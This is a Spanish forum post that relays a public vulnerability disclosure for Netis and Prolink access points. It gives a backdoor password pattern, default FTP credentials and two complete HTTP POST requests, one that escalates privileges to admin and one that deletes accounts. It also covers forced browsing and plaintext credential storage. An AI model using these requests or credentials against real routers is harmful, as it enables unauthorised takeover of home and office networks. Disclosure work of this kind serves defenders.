El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

nord_600_250

#1 16-10-2015 15:32:04

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,701

Puerta trasera y otras delicias en puntos de acceso Netis y Prolink

Puerta trasera y otras delicias en los puntos de acceso Netis

 

netis_2.jpg

  Hay marcas de Puntos de Acceso de las cuales nunca hemos oído hablar.
A lo mejor es por algo... tongue
  Netis sytem es una de ella.
  Es una empresa China basada en Shenzhen - una más - un lugar que parece ser la silicon valley de los routers.
  Los de Netis sytem prometen nada más ni menos que "Una tecnología y un cualidad sobresalientes con un servicio perfecto"
  No dudo de que el simpático equipo en su local de 20 000 metros cuadrados (y además tienen un bonzaï; podéis ver las fotos aqui netis company profile) lo da todo para el cliente.
  El problema que tienen es que parecen un poco perdidos en lo que es "seguridad".

  Es lo que demuestra Karn GANESHEN en un "full disclosure" publicado el 13 de octubre (2015):

Y lo que sugiere en su "timeline" :

r escribió:

# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?] (Respuesta del fabricante : ¿Una vulnerabilidad?¿Que es esto?)

lol

Las vulnerabilidades descritas afectan a todos los PA con chipset Realtek que tiran del firmware RTK v2.1.1

Puertas traseras http y credenciales débiles en ftp

 

  - http

 

  El router tiene dos cuentas : la de administrador ( guest:guest ) y la de usuario ( user:user ).
Es un poco para despistarse llamar a "guest" el superusario y a "user" el usuario con menos privilegios.
La cuenta guest tiene un nivel de privilegios "2" (V N="PRIORITY" V="0x2" - poder total sobre la interfaz)
La cuenta de user tiene un nivel "0" y solo puede ejecutar unas tareas segundarías. ( N="PRIORITY" V="0x0" )
Si cambiamos los passwords como debido estaremos protegidos.., No es así.
Un intruso podría entrar como usuario (guest) con una segunda contraseña que ha quedado habilitada.
La contraseña tiene este formato : XXXXairocon
Dónde los XXXX son simplemente los 4 últimos dígitos del bSSID.
Si se entra con esta contraseña obtenemos unos privilegios "de usaurio avanzado" (nivel 1) muy similares a los de administrador (nivel 2)
Podéis ver a continuación el fichero de configuración de la cuenta  :

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>

Con su nivel intermedio de privilegios : V="0x1"

  - ftp

  El servicio ftp viene con tres cuentas con alto nivel de privilegios.
  Con unos credenciales de los más peligrosos :

  • admin:admin

  • useradmin:useradmin

  • user:user

  Si nos se deshabilita telnet se ha de cambiar la contraseña de... 3 cuentas tongue
Sino tendremos una puerta trasera accesible a cualquier niño...

Posibilidad por un usuario sin privilegios de crear una cuenta con derechos de administrador

Por si no nos bastaba con los privilegios nivel uno, podemos tener los "super poderes" muy fácilmente.
Si quieres jugar a ser dios esto es el modo de empleo :

  1. Creamos un usuario nuevo y interceptamos nuestra petición POST

  2. Cambiamos el nivel de privilegio de 0 a 2 en los data "POST" que mandamos.

  3. No hay protección CRSF - lo que nos permite ser discretos cuando mandamos datas a ejecutar en nuestras petciones http - y la nueva cuenta no aparece en la lista de usuario big_smile

   A continuación tenéis el modelo para hacer vuestra petición con datas POST.

POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
... Y otras delicias

   De regalo : otra petición con Data POST.
Un poco malvada ya que permite a un usuario non administrador de borrar cualquier cuenta, incluso de administrador...

POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%

  Podemos también desde una cuenta con derechos restringidos ejecutar funciones que nos están supuestamente prohibidas. 
Nos basta con entrar la dirección completa de la pagina deseada en el navegador.
  Por ejemplo, para jugar con el filtrado mac

http://<IP>/fw-macfilter.htm

  Otra gran cagada tongue : los credenciales son guardados en texto plano y accesibles a cualquiera: big_smile
Podemos descargar el fichero "config.img" que contiene los credenciales.

Además, en la interfaz web ,  los passwords y otras cosas sensibles aparecen con estrellitas *.
Un usuario sin privilegios puede ver la información examinado el elemento desde el propio navegador (clic derecha + "examinar elemento") y modificando el valor de "password" a "text"

  Parta concluir una foto de familia de Netis sytem.
  Uno de ellos es el encargado de la seguridad en los firmwares.... ¿Sabrás encontrarlo? 

netis_1.jpg

edit

  Nuestro amigo Karn GANESHEN ha encontrado las mismas vulnerabilidades en otro firmware de otro fabricante lol
Se trata de Prolink y de su firmware R76S Slt 4WNE1 6.1R que encontramos en el H5004NK
  Todos los detalles en :

Ultima edición por kcdtv (16-10-2015 15:47:48)

Desconectado

Anuncio

nord_600_250

Temas similares

Tema Respuestas Vistas Ultimo mensaje
26 7781 15-03-2023 16:57:32 por kcdtv
Pegado:
34 3814 12-03-2023 18:24:22 por Guybrush92
Pegado:
Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r  [ 1 2 3 18 ]
436 63612 07-03-2023 12:35:27 por kcdtv
0 423 23-02-2023 17:09:39 por kcdtv
Pegado:
114 258658 19-02-2023 17:36:14 por chuchof

Pie de página

Información del usuario

Ultimo usuario registrado: erpini
Usuarios registrados conectados: 0
Invitados conectados: 8

Estadisticas de los foros

Número total de usuarios registrados: 2,432
Número total de temas: 1,632
Número total de mensajes: 15,528

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36